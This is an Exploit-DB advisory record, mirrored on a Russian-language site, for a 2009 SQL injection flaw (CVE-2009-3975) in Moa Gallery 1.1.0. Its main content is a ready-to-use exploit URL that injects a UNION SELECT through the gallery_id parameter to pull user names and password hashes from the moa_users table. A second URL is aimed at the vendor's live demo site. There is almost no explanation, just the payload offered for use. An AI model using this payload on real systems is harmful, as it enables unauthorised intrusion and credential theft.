- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 9481
- Проверка EDB
-
- Пройдено
- Автор
- MR.TRO0OQY
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2009-3975
- Дата публикации
- 2009-08-24
Код:
======================================================================
[»] Script : Moa gallery 1.1.0 (gallery_id) Remote Sql injection vuln
[»] Language : php
[»] Download : http://sourceforge.net/projects/moagallery/
[»] Script site : http://www.moagallery.net/
[»] Founder: Mr.tro0oqy <- from Yemen
[»] Gr44tz to: [H]-> borken heart :(
[»] E-mail : t.4@windowslive.com
======================================================================
exploit:
--------
http://www.xxx.com/path/index.php?action=gallery_view&gallery_id=-0000000009+union+select+concat(name,char(58),password)+from+moa_users--
--------
demo:
--------
http://www.moagallery.net/demo/index.php?action=gallery_view&gallery_id=-0000000609+union+select+concat%28name,char%2858%29,password%29+from+moa_users--
# milw0rm.com [2009-08-24]- Источник
- www.exploit-db.com
